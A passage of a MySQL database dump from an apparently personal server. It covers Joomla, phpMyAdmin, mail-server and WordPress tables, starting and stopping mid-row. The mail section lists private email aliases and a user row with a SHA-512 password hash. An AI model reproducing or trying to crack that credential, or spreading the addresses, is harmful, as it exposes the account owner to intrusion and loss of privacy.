00:00:00','','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0); /*!40000 ALTER TABLE `qo1a2_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_viewlevels` -- DROP TABLE IF EXISTS `qo1a2_viewlevels`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_viewlevels` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', `title` varchar(100) NOT NULL DEFAULT '', `ordering` int(11) NOT NULL DEFAULT '0', `rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.', PRIMARY KEY (`id`), UNIQUE KEY `idx_assetgroup_title_lookup` (`title`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_viewlevels` -- LOCK TABLES `qo1a2_viewlevels` WRITE; /*!40000 ALTER TABLE `qo1a2_viewlevels` DISABLE KEYS */; INSERT INTO `qo1a2_viewlevels` VALUES (1,'Public',0,'[1]'),(2,'Registered',1,'[6,2,8]'),(3,'Special',2,'[6,3,8]'),(5,'Guest',0,'[9]'),(6,'Super Users',0,'[8]'); /*!40000 ALTER TABLE `qo1a2_viewlevels` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_weblinks` -- DROP TABLE IF EXISTS `qo1a2_weblinks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_weblinks` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `catid` int(11) NOT NULL DEFAULT '0', `title` varchar(250) NOT NULL DEFAULT '', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `url` varchar(250) NOT NULL DEFAULT '', `description` text NOT NULL, `hits` int(11) NOT NULL DEFAULT '0', `state` tinyint(1) NOT NULL DEFAULT '0', `checked_out` int(11) NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `ordering` int(11) NOT NULL DEFAULT '0', `access` int(11) NOT NULL DEFAULT '1', `params` text NOT NULL, `language` char(7) NOT NULL DEFAULT '', `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `metadata` text NOT NULL, `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if link is featured.', `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `version` int(10) unsigned NOT NULL DEFAULT '1', `images` text NOT NULL, PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`state`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_featured_catid` (`featured`,`catid`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_weblinks` -- LOCK TABLES `qo1a2_weblinks` WRITE; /*!40000 ALTER TABLE `qo1a2_weblinks` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_weblinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping events for database 'ollital_joomla' -- -- -- Current Database: `phpmyadmin` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `phpmyadmin` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `phpmyadmin`; -- -- Table structure for table `pma_bookmark` -- DROP TABLE IF EXISTS `pma_bookmark`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pma_bookmark` ( `id` int(11) NOT NULL AUTO_INCREMENT, `dbase` varchar(255) COLLATE utf8_bin NOT NULL DEFAULT '', `user` varchar(255) COLLATE utf8_bin NOT NULL DEFAULT '', `label` varchar(255) CHARACTER SET utf8 NOT NULL DEFAULT '', `query` text COLLATE utf8_bin NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Bookmarks'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `pma_bookmark` -- LOCK TABLES `pma_bookmark` WRITE; /*!40000 ALTER TABLE `pma_bookmark` DISABLE KEYS */; /*!40000 ALTER TABLE `pma_bookmark` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `pma_column_info` -- DROP TABLE IF EXISTS `pma_column_info`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pma_column_info` ( `id` int(5) unsigned NOT NULL AUTO_INCREMENT, `db_name` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `table_name` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `column_name` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `comment` varchar(255) CHARACTER SET utf8 NOT NULL DEFAULT '', `mimetype` varchar(255) CHARACTER SET utf8 NOT NULL DEFAULT '', `transformation` varchar(255) COLLATE utf8_bin NOT NULL DEFAULT '', `transformation_options` varchar(255) COLLATE utf8_bin NOT NULL DEFAULT '', PRIMARY KEY (`id`), UNIQUE KEY `db_name` (`db_name`,`table_name`,`column_name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Column information for phpMyAdmin'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `pma_column_info` -- LOCK TABLES `pma_column_info` WRITE; /*!40000 ALTER TABLE `pma_column_info` DISABLE KEYS */; /*!40000 ALTER TABLE `pma_column_info` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `pma_designer_coords` -- DROP TABLE IF EXISTS `pma_designer_coords`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pma_designer_coords` ( `db_name` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `table_name` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `x` int(11) DEFAULT NULL, `y` int(11) DEFAULT NULL, `v` tinyint(4) DEFAULT NULL, `h` tinyint(4) DEFAULT NULL, PRIMARY KEY (`db_name`,`table_name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Table coordinates for Designer'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `pma_designer_coords` -- LOCK TABLES `pma_designer_coords` WRITE; /*!40000 ALTER TABLE `pma_designer_coords` DISABLE KEYS */; /*!40000 ALTER TABLE `pma_designer_coords` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `pma_history` -- DROP TABLE IF EXISTS `pma_history`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pma_history` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `username` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `db` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `table` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `timevalue` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `sqlquery` text COLLATE utf8_bin NOT NULL, PRIMARY KEY (`id`), KEY `username` (`username`,`db`,`table`,`timevalue`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='SQL history for phpMyAdmin'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `pma_history` -- LOCK TABLES `pma_history` WRITE; /*!40000 ALTER TABLE `pma_history` DISABLE KEYS */; /*!40000 ALTER TABLE `pma_history` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `pma_pdf_pages` -- DROP TABLE IF EXISTS `pma_pdf_pages`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pma_pdf_pages` ( `db_name` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `page_nr` int(10) unsigned NOT NULL AUTO_INCREMENT, `page_descr` varchar(50) CHARACTER SET utf8 NOT NULL DEFAULT '', PRIMARY KEY (`page_nr`), KEY `db_name` (`db_name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='PDF relation pages for phpMyAdmin'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `pma_pdf_pages` -- LOCK TABLES `pma_pdf_pages` WRITE; /*!40000 ALTER TABLE `pma_pdf_pages` DISABLE KEYS */; /*!40000 ALTER TABLE `pma_pdf_pages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `pma_relation` -- DROP TABLE IF EXISTS `pma_relation`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pma_relation` ( `master_db` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `master_table` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `master_field` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `foreign_db` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `foreign_table` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `foreign_field` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', PRIMARY KEY (`master_db`,`master_table`,`master_field`), KEY `foreign_field` (`foreign_db`,`foreign_table`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Relation table'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `pma_relation` -- LOCK TABLES `pma_relation` WRITE; /*!40000 ALTER TABLE `pma_relation` DISABLE KEYS */; /*!40000 ALTER TABLE `pma_relation` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `pma_table_coords` -- DROP TABLE IF EXISTS `pma_table_coords`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pma_table_coords` ( `db_name` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `table_name` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `pdf_page_number` int(11) NOT NULL DEFAULT '0', `x` float unsigned NOT NULL DEFAULT '0', `y` float unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`db_name`,`table_name`,`pdf_page_number`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Table coordinates for phpMyAdmin PDF output'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `pma_table_coords` -- LOCK TABLES `pma_table_coords` WRITE; /*!40000 ALTER TABLE `pma_table_coords` DISABLE KEYS */; /*!40000 ALTER TABLE `pma_table_coords` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `pma_table_info` -- DROP TABLE IF EXISTS `pma_table_info`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pma_table_info` ( `db_name` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `table_name` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', `display_field` varchar(64) COLLATE utf8_bin NOT NULL DEFAULT '', PRIMARY KEY (`db_name`,`table_name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Table information for phpMyAdmin'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `pma_table_info` -- LOCK TABLES `pma_table_info` WRITE; /*!40000 ALTER TABLE `pma_table_info` DISABLE KEYS */; /*!40000 ALTER TABLE `pma_table_info` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `pma_tracking` -- DROP TABLE IF EXISTS `pma_tracking`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pma_tracking` ( `db_name` varchar(64) COLLATE utf8_bin NOT NULL, `table_name` varchar(64) COLLATE utf8_bin NOT NULL, `version` int(10) unsigned NOT NULL, `date_created` datetime NOT NULL, `date_updated` datetime NOT NULL, `schema_snapshot` text COLLATE utf8_bin NOT NULL, `schema_sql` text COLLATE utf8_bin, `data_sql` longtext COLLATE utf8_bin, `tracking` set('UPDATE','REPLACE','INSERT','DELETE','TRUNCATE','CREATE DATABASE','ALTER DATABASE','DROP DATABASE','CREATE TABLE','ALTER TABLE','RENAME TABLE','DROP TABLE','CREATE INDEX','DROP INDEX','CREATE VIEW','ALTER VIEW','DROP VIEW') COLLATE utf8_bin DEFAULT NULL, `tracking_active` int(1) unsigned NOT NULL DEFAULT '1', PRIMARY KEY (`db_name`,`table_name`,`version`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin ROW_FORMAT=COMPACT; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `pma_tracking` -- LOCK TABLES `pma_tracking` WRITE; /*!40000 ALTER TABLE `pma_tracking` DISABLE KEYS */; /*!40000 ALTER TABLE `pma_tracking` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `pma_userconfig` -- DROP TABLE IF EXISTS `pma_userconfig`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pma_userconfig` ( `username` varchar(64) COLLATE utf8_bin NOT NULL, `timevalue` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `config_data` text COLLATE utf8_bin NOT NULL, PRIMARY KEY (`username`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='User preferences storage for phpMyAdmin'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `pma_userconfig` -- LOCK TABLES `pma_userconfig` WRITE; /*!40000 ALTER TABLE `pma_userconfig` DISABLE KEYS */; /*!40000 ALTER TABLE `pma_userconfig` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping events for database 'phpmyadmin' -- -- -- Current Database: `redmine_default` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `redmine_default` /*!40100 DEFAULT CHARACTER SET utf8 */; USE `redmine_default`; -- -- Dumping events for database 'redmine_default' -- -- -- Current Database: `vmail` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `vmail` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `vmail`; -- -- Table structure for table `aliases` -- DROP TABLE IF EXISTS `aliases`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `aliases` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `source` varchar(128) NOT NULL, `destination` varchar(128) NOT NULL, PRIMARY KEY (`source`,`destination`), UNIQUE KEY `id` (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `aliases` -- LOCK TABLES `aliases` WRITE; /*!40000 ALTER TABLE `aliases` DISABLE KEYS */; INSERT INTO `aliases` VALUES (1,'piratolli@ollital.de','olli@ollital.de'),(2,'xface@ollital.de','olli@ollital.de'),(3,'ollirat@ollital.de','olli@ollital.de'),(4,'zwitscher@ollital.de','olli@ollital.de'),(5,'wgo1212@ollital.de','olli@ollital.de'),(6,'multim@ollital.de','olli@ollital.de'),(7,'darkwing@ollital.de','olli@ollital.de'),(8,'admin@ollital.de','olli@ollital.de'); /*!40000 ALTER TABLE `aliases` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `domains` -- DROP TABLE IF EXISTS `domains`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `domains` ( `domain` varchar(128) NOT NULL, UNIQUE KEY `domain` (`domain`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `domains` -- LOCK TABLES `domains` WRITE; /*!40000 ALTER TABLE `domains` DISABLE KEYS */; INSERT INTO `domains` VALUES ('ollital.de'); /*!40000 ALTER TABLE `domains` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `users` -- DROP TABLE IF EXISTS `users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `users` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `username` varchar(128) NOT NULL, `domain` varchar(128) NOT NULL, `password` varchar(128) NOT NULL, PRIMARY KEY (`username`,`domain`), UNIQUE KEY `id` (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `users` -- LOCK TABLES `users` WRITE; /*!40000 ALTER TABLE `users` DISABLE KEYS */; INSERT INTO `users` VALUES (1,'olli','ollital.de','$6$r2v/2l5OHfIo3rtv$94LlO//EEZDWu/ltA0LyaRLkepTY0Fm2JfSJ9wFnZgmxN.P5vjIv/CVP2AELutAAn54sRDPGPO.Spi58CGJlp/'); /*!40000 ALTER TABLE `users` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping events for database 'vmail' -- -- -- Current Database: `wordpress` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `wordpress` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `wordpress`; -- -- Table structure for table `wp_commentmeta` -- DROP TABLE IF EXISTS `wp_commentmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_commentmeta` ( `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0', `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL, `meta_value` longtext COLLATE utf8mb4_unicode_ci, PRIMARY KEY (`meta_id`), KEY `comment_id` (`comment_id`), KEY `meta_key` (`meta_key`(191)) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_commentmeta` -- LOCK TABLES `wp_commentmeta` WRITE; /*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_comments` -- DROP TABLE IF EXISTS `wp_comments`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_comments` ( `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0', `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL, `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL, `comment_karma` int(11) NOT NULL DEFAULT '0', `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1', `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0', `user_id` bigint(20) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`comment_ID`), KEY `comment_post_ID` (`comment_post_ID`), KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`), KEY `comment_date_gmt` (`comment_date_gmt`), KEY `comment_parent` (`comment_parent`), KEY `comment_author_email` (`comment_author_email`(10)) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_comments` -- LOCK TABLES `wp_comments` WRITE; /*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_ez_adsense_options` -- DROP TABLE IF EXISTS `wp_ez_adsense_options`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_ez_adsense_options` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, `plugin_slug` varchar(255) NOT NULL DEFAULT '', `theme` varchar(255) NOT NULL DEFAULT '', `provider` varchar(255) NOT NULL DEFAULT '', `optionset` varchar(255) NOT NULL, `name` varchar(255) NOT NULL, `value` text NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `option_id` (`plugin_slug`(64),`theme`(64),`optionset`(64),`name`(64)) ) ENGINE=InnoDB AUTO_INCREMENT=111 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_ez_adsense_options` -- LOCK TABLES `wp_ez_adsense_options` WRITE; /*!40000 ALTER TABLE `wp_ez_adsense_options` DISABLE KEYS */; INSERT INTO `wp_ez_adsense_options` VALUES (1,'2015-05-07 07:30:13','easy-adsense','twentythirteen','AdSense','Imported','show_leadin','float:right'),(2,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','wc_leadin','0'),(3,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','margin_leadin','12'),(4,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','text_leadin','\r\n\r\n\r\n'),(5,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','show_midtext','float:left'),(6,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','header_leadin',''),(7,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','wc_midtext','0'),(8,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','margin_midtext','12'),(9,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','text_midtext','\r\n\r\n\r\n'),(10,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','show_leadout','no'),(11,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','wc_leadout','0'),(12,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','margin_leadout','12'),(13,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','text_leadout','\r\n\r\n\r\n'),(14,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','show_widget','text-align:center'),(15,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','footer_leadout',''),(16,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','margin_widget','12'),(17,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','text_widget','Please generate and paste your ad code here. If left empty, the ad location will be highlighted on your blog pages with a reminder to enter your code.'),(18,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','show_lu','text-align:center'),(19,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','margin_lu','12'),(20,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','text_lu','Please generate and paste your ad code here. If left empty, the ad location will be highlighted on your blog pages with a reminder to enter your code.'),(21,'2015-05-07 07:30:14','easy-adsense','twentythirteen','AdSense','Imported','title_gsearch',''),(22,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','title_gsearch_custom',''),(23,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','kill_gsearch_title',''),(24,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','margin_gsearch','0'),(25,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','text_gsearch','Please generate and paste your ad code here. If left empty, the ad location will be highlighted on your blog pages with a reminder to enter your code.'),(26,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','max_count','1'),(27,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','max_link','0'),(28,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','force_midad','on'),(29,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','force_widget',''),(30,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','kill_page',''),(31,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','show_borders',''),(32,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','border_width','1'),(33,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','border_normal','00FFFF'),(34,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','border_color','FF0000'),(35,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','border_widget',''),(36,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','border_lu',''),(37,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','title_lu',''),(38,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','kill_lu_title',''),(39,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','kill_attachment',''),(40,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','kill_home',''),(41,'2015-05-07 07:30:15','easy-adsense','twentythirteen','AdSense','Imported','kill_front_page',''),(42,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_category',''),(43,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_tag',''),(44,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_archive',''),(45,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_inline',''),(46,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_widget_title',''),(47,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_linebreaks',''),(48,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_single',''),(49,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_search',''),(50,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_sticky',''),(51,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','title_widget',''),(52,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','suppressBoxes',''),(53,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_invites',''),(54,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_rating',''),(55,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Imported','kill_author',''),(56,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Default','show_leadin','float:right'),(57,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Default','wc_leadin','0'),(58,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Default','margin_leadin','12'),(59,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Default','text_leadin','\r\n\r\n\r\n'),(60,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Default','show_midtext','float:left'),(61,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Default','header_leadin',''),(62,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Default','wc_midtext','0'),(63,'2015-05-07 07:30:16','easy-adsense','twentythirteen','AdSense','Default','margin_midtext','12'),(64,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','text_midtext','\r\n\r\n\r\n'),(65,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','show_leadout','no'),(66,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','wc_leadout','0'),(67,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','margin_leadout','12'),(68,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','text_leadout','\r\n\r\n\r\n'),(69,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','show_widget','text-align:center'),(70,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','footer_leadout',''),(71,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','margin_widget','12'),(72,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','text_widget','Please generate and paste your ad code here. If left empty, the ad location will be highlighted on your blog pages with a reminder to enter your code.'),(73,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','show_lu','text-align:center'),(74,'2015-05-07 